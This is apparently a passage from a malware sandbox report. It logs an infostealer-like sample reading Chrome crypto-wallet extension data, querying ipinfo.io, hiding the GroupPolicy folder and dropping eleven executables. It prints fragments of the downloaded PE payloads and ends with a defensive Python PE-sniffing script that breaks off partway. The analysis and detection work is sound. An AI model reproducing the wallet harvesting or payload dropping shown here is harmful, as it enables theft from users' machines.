file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
domain ipinfo.io
file C:\Users\test22\Documents\SimpleAdobe\_8yuL8qjJtP5NZqy7PzNyVXU.exe
file C:\Users\test22\Documents\SimpleAdobe\o_CeSdAw1K73YQlvgMMzEXT2.exe
file C:\Users\test22\Documents\SimpleAdobe\4Ko_aC6s3slEKqtxKW0CJGYX.exe
file C:\Users\test22\Documents\SimpleAdobe\HV0uZnmSdVHbUO7nRUiZwFU8.exe
file C:\Users\test22\Documents\SimpleAdobe\JLVgQHE0e3zqt0CoYzevdDqB.exe
file C:\Users\test22\Documents\SimpleAdobe\vE9E4cuoYSHSDzLpSZTsGcKe.exe
file C:\Users\test22\Documents\SimpleAdobe\ivWgK3rxWR3mMHVNHWY3ae5i.exe
file C:\Users\test22\Documents\SimpleAdobe\phD32zk70jfeSiOlFqUzmEx4.exe
file C:\Users\test22\Documents\SimpleAdobe\ZW7uNr1lwJSS3G43lu8CBjiA.exe
file C:\Users\test22\Documents\SimpleAdobe\ueGCmF16p4IowThmgSvN3gQl.exe
file C:\Users\test22\Documents\SimpleAdobe\Eek13wjutSlE27l5yJOzFEvs.exe
Time & API Arguments Status Return Repeated
SetFileAttributesW  file_attributes=2 (FILE_ATTRIBUTE_HIDDEN)  filepath=C:\Windows\System32\GroupPolicy  filepath_r=C:\Windows\System32\GroupPolicy  | status 1, return 1, repeated 0
Time & API Arguments Status Return Repeated
GetAdaptersAddresses  flags=15 (GAA_FLAG_SKIP_UNICAST|GAA_FLAG_SKIP_ANYCAST|GAA_FLAG_SKIP_MULTICAST|GAA_FLAG_SKIP_DNS_SERVER)  family=0 (AF_UNSPEC)  | return 111 (ERROR_BUFFER_OVERFLOW, the buffer-sizing call; shown fused as "111 0" in the raw report), repeated 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Ìý©&ˆœÇuˆœÇuˆœÇu–ÎCu¬œÇu–ÎRu›œÇu–ÎDuÿœÇu¯Z¼uœÇuˆœÆuâœÇu–ÎMu‰œÇu–ÎSu‰œÇu–ÎVu‰œÇuRichˆœÇuPELm¾2dà  àÜ{¼ð@|ÜãܝPz¸ôð|.textÌÞà `.rdataŽ¶ð¸ä@@.data|Ñw°Jœ@À.rsrc¸ôzöæ@@; °BuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; ·Bt‹ ¬¶B…Hpuè#‰‹F;°µBt‹F‹ ¬¶B…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿ|ð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿ|ð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿ|ð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hà™Bè¤3ƒeä‹u;5Tqºw"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=€ð@ƒ=,ôBuè7jèR5hÿèÎYY¡Dqºƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,ôBÿ׋؅Ûu.j ^9H÷Btÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc0098
1 1 0

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽ Ä  @0&@`”"ÐZ°Ô CODET `DATAô' ( @ÀBSSÅ P4À.idata”"`$4@À.tlsXÀ.rdata X@P.relocÔ°Z@P.rsrcZÐZv@P0&Ð%@P@Boolean@FalseTrue@,@ WideCharÿÿD@CharÿX@Shortint€ÿÿÿp@Smallint€ÿÿÿˆ@Integer€ÿÿÿ‹À @Byteÿ´@WordÿÿÈ@ExtendedØ@Cardinalÿÿÿÿð@Int64€ÿÿÿÿÿÿÿ @Single@@Double@,@Real8@CompD@CurrencyT@ ShortStringÿ‹Àh@ByteBool€ÿÿÿd@FalseTrue‹À@WordBool€ÿÿÿŒ@FalseTrue‹À¸@LongBool€ÿÿÿ´@FalseTrue‹Àà@ Stringì@ WideStringü@ Variant@ @ OleVariantd@d@86@D6@H6@L6@@6@˜3@´3@ð3@TObjectp@TObjectd@System@ IInterfaceÀFSystemÿÿÀ@ IInvokableŒ@Systemð@ IDispatchŒ@ÀFSystemÿÿÌƒD$øé­NƒD$øéËNƒD$øéÕNÌÌ@'@1@ÀF=@@¸@I@¸@ @86@¨a@´a@L6@@6@Äa@´3@ð3@TInterfacedObject‹ÀÐ@ TBoundArray„@Systemø@ TDateT
request_handle: 0x0000000000cc0058
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $Ìý©&ˆœÇuˆœÇuˆœÇu–ÎCu¬œÇu–ÎRu›œÇu–ÎDuÿœÇu¯Z¼uœÇuˆœÆuâœÇu–ÎMu‰œÇu–ÎSu‰œÇu–ÎVu‰œÇuRichˆœÇuPEL²Ñdà  àº|¼ð@p}ûJ€Ü{Pp{¸ô wXw@ð|.textÌÞà `.rdataŽ”ð–ä@@.data|Áw@z@À.tlsÍ `{ º@À.rsrc¸ôp{öÄ@@; CuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; —Ct‹ ¬–C…Hpuè#‰‹F;°•Ct‹F‹ ¬–C…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿ|ð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿ|ð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿ|ð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hàwCè¤3ƒeä‹u;5TQ»w"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=€ð@ƒ=,ÔCuè7jèR5hÿèÎYY¡DQ»ƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,ÔCÿ׋؅Ûu.j ^9H×Ctÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc0014
1 1 0

InternetReadFile

buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $¬,3èM]EèM]EèM]EöÙEÌM]EöÈEûM]EöÞEŸM]Eϋ&EíM]EèM\EM]Eö×EéM]EöÉEéM]EöÌEéM]ERichèM]EPELíuoeà  àV|¼ð@}拁l<{ õðt.text¼Þà `.rdataâ0ð2ä@@.data|Ñw0J@À.rsrc õ{ö`@@; 0CuóÃé· ‹ÿU‹ìƒì S3Û9] uèéSSSSSÇèqƒÄƒÈÿëM‹E;ÃtÜV‰Eè‰EàEPSÿu EàPÇEäÿÿÿÇEìBèm ƒÄÿMä‹ðx‹Eàˆë EàPSèH YY‹Æ^[ÉËÿU‹ì‹EV‹ñÆF …Àucè&‰F‹Hl‰‹Hh‰N‹; 7Ct‹ ¬6C…Hpuè#‰‹F;°5Ct‹F‹ ¬6C…Hpu萉F‹Fö@puƒHpÆF ë ‹‰‹@‰F‹Æ^]‹ÿU‹ìƒì3ÉW‹ø;ñt3Àf‰;Ù„y9M „p8 „hÿuMðè?ÿÿÿ‹Eðƒxu.…ötf¶f‰‹E…ÀtÇ€}ü„;‹Eøƒ`pýé/ƒ?t~Š ˆOƒ¸¬~23Ʌö•ÁQVjWj ÿpÿtð@…Àtƒ'‹E…Àt²‹Mð‹‰¬‰륃'è<Ç*…öt3Àf‰‹E…Àtƒÿè€}ü‹„º‹Møƒapý鮍EðP¶Pèç'YY…ÀtZ‹Mð‹¬9E sŠˆ‹E…À„7ÿÿÿÇþÿÿÿé,ÿÿÿƒø~3҅ö•ÂRVPSj ÿqÿtð@…À…Pÿÿÿ€{…FÿÿÿéUÿÿÿ3À…ö•À3ÿGP‹EðVWSj ÿpÿtð@…À„4ÿÿÿ‹E…À„Ëþÿÿ‰8éÄþÿÿ‹E;Át‰3À_ÉËÿU‹ì‹Eƒì ƒøÿu¸ÿÿÉÃeôƒeøƒMüÿSVˆE jEüjPEô] uøèþÿÿƒÄ ƒ}ü^[¸ÿÿ|·EøÉÃj hpCè¤3ƒeä‹u;5Tñºw"jè”(YƒeüVè›0Y‰EäÇEüþÿÿÿè ‹Eäè°3Ãjè'YËÿU‹ìV‹uƒþà‡¡SW‹=xð@ƒ=,tCuè7jèR5hÿèÎYY¡Dñºƒøu…öt‹Æë3À@Pëƒøu VèSÿÿÿY…Àu…öuFƒÆƒæðVjÿ5,tCÿ׋؅Ûu.j ^9HwCtÿuèâ6Y…Àt‹ué{ÿÿÿè‰
request_handle: 0x0000000000cc00cc
1 1 0

InternetReadFile

buffer: MZÿÿ¸@к´ Í!¸LÍ!This program cannot be run in DOS mode. $é¶ßYˆØŒYˆØŒYˆØŒ3”ÚŒpˆØŒYˆÙŒ[ˆØŒë”ÈŒ[ˆØŒYˆØŒVˆØŒáŽÞŒXˆØŒRichYˆØŒPELˆ»‹dà  Þ²àÝ@ðG@…ŒŒààP8.textËáÞ `.rdata â@@.data¤0”þ@À.rsrcàà’@@¹€;Ù†s[Ìém[‹MˆƒÁ‰Dÿÿÿ‹Uü‹…Dÿÿÿ‰B4‹Dÿÿÿ‰4ÿÿÿé4¼‹Uü‹Pÿ 0A¶ƒé¶ÑR‹Eü‹Qÿ0A‹‰Uð‹Eð‰Eì3É…ŒéÀu+ë0Bpq‹EüƒÀ‰Eüé€,U‹ìƒì<VW‹EPèQ¯ƒÄ‰Eü‹EüƒÀX™‹È‹ò‹E™+Èò‰MøfWÀfEìÇEÜÿÿÿÿÇEà‹U܃‹EàƒÐ‰U܉Eà‹M‰MôfWÀfEäéSÇEÌéu…‹U‹Eø; ÌkMükUø‹E‹u‰Eð‰Mô‰uè‰Uì‹Mô‹Uð‹Eì‹uè‹L ;L‚b¢‡hr‹Uô‹Eð‹Mì‹uè‹T;T†B¢éIr‹Uü‹Eü‹J8+H4Áé ‹Uü¯J@‹Eü‹P4ыEü‹Mü‹@8+A4%ÿ‹Mü¯A@Áè ЉU‹Uü‹B<;E‡ÍÈDžlÿÿÿé ¸‹UèR‹E‹H\Q‹UôR‹EðPèa¦ƒÄ…À… ¥ƒÈÿéÌ5ÇEüéï8•>ºŒ4Hس‹UôR‹MüƒÁèB ¹kы ôÂF‹‰‚ÃF‹Mü‹A ‹å]Ã}ø„…)‹UøRÿ,0Aév)‹å]Ãè°%™RP‹EøP‹MôQèXléKJNé&­Ñ¦‡öá+ ø¹J]×ÈŋEüƒÀ‰Eüéj‹uì‹}ðƒçjj‹MèQ‹UäRèJ‹Mô‹3Àòø‹Eì‹Uð± èf¸ðú‰uì‰}ð‹Mð;Mà‚:h‡‹Uì;U܆(hé‹uì‹}ðƒç‹Eì‹Uð± è#¸ðú‰uì‰}ðéþgU‹ìì$èÖF‰EÜhj‹EPè¹HƒÄ è»F‰Eøƒ}ø…åy3ÀéÎSÏ]èž_ã®6•zU‹ìƒì SQè*h6ÊÛ0Pèý4‰Eôÿu ÿuè™7‹X‹H+ˉ]ü‰MøÿuÿuÿuøÿuüÿUôY[‹å]ÂÇEÀéár‹E鱎ÿ%D0AU‹ììÀDžDþÿÿÇEüë ‹EüƒÀ‰Eüƒ}üks‹MüDŽHþÿÿëáDž
request_handle: 0x0000000000cc00c0
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELõ%\fà  ÖH^ÎôH I@ €K@…€ôHKI„[`K 5ôH  H.textÔÔH ÖH `.rsrc„[I\ØH@@.reloc `K4K@B°ôHH¨¿ ˜²P@r#ê|%V+(f+.b( 8*B+(Ò]'4~þ*6+(aE~g~*Z+(x=.( 8*B+(8ó%V~þ*6+(2m4~*0Œ+(§4YN8qþ E8*s €8/s €8âÿÿÿs € 9¹ÿÿÿ& 8®ÿÿÿs € :™ÿÿÿ&8ÿÿÿs €8¶ÿÿÿ0Z+(;M þ8þ E*8%~o!  (9Òÿÿÿ&8Èÿÿÿ*8øÿÿÿ8óÿÿÿ0Z+(R­N; þ8þ E'8"~o"  (9Òÿÿÿ&8Èÿÿÿ88*0Z+(Ž&H þ8þ E'8"~o#  ( :Òÿÿÿ&8Èÿÿÿ88*0M+(PÝ{^8þ E8~o$ 8*8øÿÿÿ (9Éÿÿÿ&8¿ÿÿÿ0Z+(¡4j] þ8þ E*8%~o%  (9Òÿÿÿ&8Èÿÿÿ*8øÿÿÿ8óÿÿÿB+({']T~þ*6+(m¯hB~*0k+(UQ þ8þ E8 8883{ 8éÿÿÿ{ (+}  (:·ÿÿÿ&8­ÿÿÿ*0¡+(°8P þ8þ EM'h8H (31s& z| o+8M{ @5 (:­ÿÿÿ& 8¢ÿÿÿ8" (:ÿÿÿ&8ƒÿÿÿ9¦ÿÿÿ8‘ÿÿÿ*0-+(÷G9<Œ9þo' 9ý~ 9:~ Ð(( o) 9 J(31(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †(31 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy
request_handle: 0x0000000000cc00a0
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELE$\fà  fHH.„H  H@  K@…àƒHK H EK „ƒH  H.text4dH fH `.rsrc E HFhH@@.reloc K®J@B„HH/ ™Y È"m¶%V+(•áU( 8*B+(I)_~þ*6+(~ÆkD~*Z+(ÏÎiH( 8*B+(Àd{n~þ*6+(?rR~*0w+(&—e48!þ E#8s €8s €8s €8Óÿÿÿ*s €8s € :Ÿÿÿÿ&8•ÿÿÿ0++(» ]O8*~o! 88æÿÿÿ8áÿÿÿ0++(€M\38 88~o" 8äÿÿÿ*0&+(;J7~o# 8*8øÿÿÿ8óÿÿÿ0++(@g8*~o$ 88æÿÿÿ8áÿÿÿ0&+(DoWQ~o% 8*8øÿÿÿ8óÿÿÿB+(lÐjh~þ*6+(Üø1<~*0c+(íNc8þ E8{ (+} 8 8'8"{  (:»ÿÿÿ& 8°ÿÿÿ*0{+(}ŸgL8þ EV8Q{ @E8%* (Ê0s& z| o+8Ûÿÿÿ8Öÿÿÿ (:§ÿÿÿ&8ÿÿÿ9Ìÿÿÿ8·ÿÿÿ0-+(’ö&VŒ9þo' 9ý~ 9:~ Ð(( o) 9 J(Ê0(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †(Ê0 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy0& +(hÿ@\þo5 þ*Z+(=Ó|;(6 8*0( +(áWDn(7 (8 888*0'+(K[48 88(9 8èÿÿÿ*0& +(IV`Ð(( 8*8øÿÿÿ8óÿÿÿ0' +(¸rg8 *8øÿÿÿ8óÿÿÿ(8èÿÿÿB+(=gS~ þ*
request_handle: 0x0000000000cc004c
1 1 0

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*à ”F$›°@@€@ÐP ,ðCODED’” `DATAL°˜@ÀBSSHÀœÀ.idataP Ð œ@À.tlsà¦À.rdatað¦@P.reloc´@P.rsrc,,¨@P@Þ@P string<@m@Ä)@¬(@Ô(@)@ $)@Free0)@ InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName€(@ ClassNameIs¨(@ ClassParentÀ)@ ClassInfoø(@ InstanceSize°)@ InheritsFromÈ)@Dispatchð)@ MethodAddress<*@ MethodNamex*@ FieldAddressÄ)@DefaultHandler¬(@ NewInstanceÔ(@ FreeInstanceTObject@Í@ÿ% Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ% Ñ@‹Àÿ%Ñ@‹Àÿ%(Ñ@‹Àÿ%Ñ@‹Àÿ%Ñ@‹Àÿ%üÐ@‹Àÿ%øÐ@‹Àÿ%ôÐ@‹Àÿ%ðÐ@‹Àÿ%ìÐ@‹Àÿ%èÐ@‹Àÿ%äÐ@‹Àÿ%àÐ@‹Àÿ%ÜÐ@‹Àÿ%ØÐ@‹Àÿ%ÔÐ@‹Àÿ%@Ñ@‹Àÿ%<Ñ@‹Àÿ%8Ñ@‹Àÿ%4Ñ@‹Àÿ%0Ñ@‹Àÿ%ÐÐ@‹Àÿ%ÌÐ@‹Àÿ%ÈÐ@‹Àÿ%ÄÐ@‹Àÿ%ÀÐ@‹Àÿ%¼Ð@‹Àÿ%¸Ð@‹Àÿ%´Ð@‹ÀSV¾8Ä@ƒ>u:hDjè¨ÿÿÿ‹È…Éu3À^[á4Ä@‰‰ 4Ä@3ҋÂÀDÁ‹‰‰Bƒúduì‹‹‰^[Љ‰@ËÀSV‹ò‹Øèÿÿÿ…Àu3À^[ˉP‹V‰P ‹‰‰X‰B‰°^[ËP‹‰ ‰Q‹8Ä@‰£8Ä@ÃSVWUQ‹ñ‰$‹è‹]‹$‹‰‹P‰V‹;‹C‹ÐS ;u‹Ãè·ÿÿÿ‹C‰‹C Fë‹V;Âu ‹Ãèšÿÿÿ‹C F‹ß;ëu‹֋ÅèUÿÿÿ„Àu3À‰Z]_^[Í@SVWUƒÄø‹Ø‹û‹2‹C;ðrl‹ÎJ‹èk ;Íw^;ðu‹BC‹B)C ƒ{ uD‹Ãè5ÿÿÿë;‹ ‹r΋ø{ ;Ïu)s ë&‹ J‰ $+ù
request_handle: 0x0000000000cc0070
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $j™ä.øs·.øs·.øs·e€p¶%øs·e€v¶îøs·e€t¶/øs·ìyŽ·*øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·e€w¶6øs·e€u¶/øs·e€r¶5øs·.ør·ùs·Ýzz¶2øs·ÝzŒ·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà '¼|DSÐ@ S@€8@IÔ`°(@I°8@IÀ< @à€Ð@ @àPPB @à  J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IÚ ` @à¤ÌÁ.ˆÜ$mo%Í:Ñý~*8Ñü(p[~H…™ ¸ì¦?áôšï¬ËQ™^¯imo´o`$½è¸°|-i *¹’M4#a¼:gS©TC "£ϗIi÷ð¹sçÐ6Fz§à…†îP@wl±¢KàÅ]¨Ë$°õ¾b\©§#z Žñ¦¢ªºCßòýÑ°¦à¢V¥µ=“¤‘ãRˆf¨îšu§ò“ݸˆy4וÚô2?£ŠCd¶§¼½<®ñl?2äô÷$[s [/ôra,¶TìN8”Ô•µx*¦ÌÜõ[M…‡aûšà†o/gESjÄaM²§žä¿tê]½{š˜@ŒÚ¾”Àk‚©¤7É (͝‚¨4Ìt ¬€ WaD‡Mc‡Rn–¹|ÖÀêê­í7H«§bØi´ )AtX¿ÉSÄ+]j#‚~°â…žc)òUYny ¹ ›Гþ>…ºç QõTˆ;ӛæÁ-3oz†HaA7wq‡h4´p(La–üÚS>Ì*1¿÷•æ5é2Ké¤ù4fxZÑλLŸÄ3yîªÌL30 Í%ú…•,[r:§QyÒñ üË玸þ)a—yÄyUc3O„ë€ç£2¾gÈå#b€Z;’dÙµWÆ íIùh)·‹?±Òñ“gSH°†Mj°“¾aÈÙ N;Á.žÒØn¡¢`#çžn_«̯&_Þ'Î#ŒÜÐ4|À¥S&€n"Á €f‰ÔÃš”ߟ¿ÜÐIeÝë遴#uvÓBª{·õï­ëԚ.v¼ã‘c¬È˥ʟ´É¯ümÍí…[RF«£Z¿t܀´'û†Õ’8ˆ÷[GT¯px­•áFPôem]{ú!¸ÀaÑÝQC¡̾Oä=–4ì÷¶* ¿¨reüÿ€åkiIY%ëq ÃÀ÷;šWú¶‘C{RKdÄ:}°ZAmœ™~þä‹‡÷.¶Ñ÷ýl‚Hp(St`…9%¢ýæé>½~ÄYxçÏz/Mæ‘ÃR¿1SƒÈú¹ÍY™CL¿Á<™S¨»i„qàäR «^“ ƒI¢Òûí5üª\ò66-côD¡ZäAÊBãêšÛŠ×¤=à—5ïºu{%Þ‹J×IÇõé>´|a#õÃ×ÃÍ®´0•`ŠSzž*)$ïLÎRh+ÿáL°ÅŸ¾«ˆ+¬Šçʒ ÎØö̐†!Ð!éPýÆÿé_Ö{m0…‘˜Ë-©{O5׶f»F]‘0,ÎÐPlÞ$l¤qW^:´ˆÑÉ©êóo6®*Ó¼È)4Þ)eÄF0ŸÕû
request_handle: 0x0000000000cc0088
1 1 0

InternetReadFile

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd† â_3fð# €,Ê`‹ú@À¥ 06‘d¥X,Y¥ü*€ŠŒ(ÀW¥8°÷h.text¶~ `.rdatað@@.dataÈæÉ°@À.pdata€ Ê@@.00cfg°Ê@@.tlsÀÊ@À.text0ìÓ,ÐÊ `.text18°÷ @À.text2üíÀ÷Ä­`h.rsrcX,¥.Ò­@@Œ™‰Êj’jEf̺D _Žñ÷êý’0,’¶ Š
request_handle: 0x0000000000cc007c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL0%\fà  ‚HZ.¡H ÀH@ @K@…à HKÀH W K  H  H.text4H ‚H `.rsrc WÀHX„H@@.reloc KÜJ@B¡HHÄq |¨J@#E%V+(¬BRi( 8*B+(‰23<~þ*6+(÷žN_~*Z+( hb( 8*B+(6ÈO2~þ*6+( ÓI\~*0‡+(÷&O8þ EO@8Js €8s €8*s € 9¹ÿÿÿ&8¯ÿÿÿs €8Åÿÿÿs € :ÿÿÿ&8…ÿÿÿ0++(Æ `8 88~o! 8äÿÿÿ*0++(ÍÆlL8 88*~o" 8áÿÿÿ0++(IÅxP8 88*~o# 8áÿÿÿ0++(£B:8*~o$ 88æÿÿÿ8áÿÿÿ0++(ýM>8 88~o% 8äÿÿÿ*B+(AöU5~þ*6+(²¸G_~*0c+(188þ E8*{ (+} 88âÿÿÿ (9Åÿÿÿ& 8ºÿÿÿ{ 8Ôÿÿÿ0ž+(®y.8~þ E~8:/8 8h (:Íÿÿÿ& 8Âÿÿÿ88 (s& z| o+ (:Œÿÿÿ&8‚ÿÿÿ{ @Œÿÿÿ8“ÿÿÿ*0-+(0Œ9þo' 9ý~ 9:~ Ð(( o) 9 J( 1(* s+ z8 s, € ~ Ð(( o- (+ ݔ݀ui%:&8% (/ o0 þþþþ& †( 1 o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8*ŒÆ?œŒy0& +(jŽ].þo5 þ*Z+(Œ¸Y^(6 8*0( +("¿w[(7 (8 8*8øÿÿÿ8óÿÿÿ0'+(;¡D@8*(9 88êÿÿÿ8åÿÿÿ0+ +(Ï@3M8 *8øÿÿÿ8óÿÿÿÐ(( 8äÿÿÿ0'
request_handle: 0x0000000000cc0038
1 1 0
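Every InternetReadFile buffer above begins with "MZ" and carries a DOS-stub string: "This program cannot be run in DOS mode" (the MSVC stub, followed by a "Rich" header) or "This program must be run under Win32" (the Borland/Delphi stub), and one of them continues with "PEd†", i.e. the bytes 64 86 of machine type 0x8664, a 64-bit image. The Python below is an added example, not part of the ZeroBOX report or of the sample: it sniffs such download buffers, validates the MZ and PE signatures, reads the machine type, optional-header magic and section names, classifies the DOS stub, and tolerates a truncated buffer. The sample buffers are built inside the script (minimal PE headers plus an external-IP-lookup style JSON reply); none of the report's bytes are reused.

```python
"""Sniff downloaded buffers for Windows executables: MZ/PE magic, bitness,
section names and the DOS-stub flavour. Added example; the sample buffers
below are constructed here and contain no bytes from the sandbox report."""
import struct

IMAGE_FILE_MACHINE = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
IMAGE_FILE_DLL = 0x2000


def build_pe(machine, stub_text, sections, pe32plus=False, rich=False):
    """Assemble a minimal, structurally valid PE header (test data only)."""
    stub = stub_text + b"\r\r\n$"
    if rich:
        stub += b"Rich\0\0\0\0"           # stand-in for the MSVC linker's Rich header
    e_lfanew = 0x40 + len(stub)
    e_lfanew += (-e_lfanew) % 8            # PE signature is 8-byte aligned
    dos = bytearray(0x40)                  # IMAGE_DOS_HEADER
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    head = (bytes(dos) + stub).ljust(e_lfanew, b"\0")
    opt_size = 0xF0 if pe32plus else 0xE0
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (IMAGE_FILE_EXECUTABLE_IMAGE)
    coff = struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0, opt_size, 0x0002)
    opt = struct.pack("<H", 0x20B if pe32plus else 0x10B).ljust(opt_size, b"\0")
    table = b"".join(n[:8].ljust(8, b"\0") + b"\0" * 32 for n in sections)  # 40-byte entries
    return head + b"PE\0\0" + coff + opt + table


def sniff_pe(data):
    """Return header facts for a PE buffer, or {'is_pe': False} for anything else."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False}            # "MZ" text without a PE header behind it
    machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0] if opt_off + 2 <= len(data) else 0
    names = []
    for i in range(nsect):
        off = opt_off + opt_size + 40 * i
        if off + 40 > len(data):
            break                          # truncated download: keep what is there
        names.append(data[off:off + 8].rstrip(b"\0").decode("latin-1"))
    stub = data[0x40:e_lfanew]
    if b"cannot be run in DOS mode" in stub:
        stub_kind = "MSVC-style DOS stub"
    elif b"must be run under Win32" in stub:
        stub_kind = "Borland/Delphi DOS stub"
    else:
        stub_kind = "unknown DOS stub"
    return {
        "is_pe": True,
        "machine": IMAGE_FILE_MACHINE.get(machine, hex(machine)),
        "format": OPTIONAL_MAGIC.get(magic, hex(magic)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "sections": names,
        "dos_stub": stub_kind,
        "rich_header": b"Rich" in stub,
    }


def executable_downloads(buffers):
    """Names of the buffers that carry a PE image, in the order they were read."""
    return [name for name, data in buffers.items() if sniff_pe(data)["is_pe"]]


# Constructed inputs modelled on the kinds of reply InternetReadFile returned above.
SAMPLES = {
    "msvc_x86": build_pe(0x014C, b"This program cannot be run in DOS mode.",
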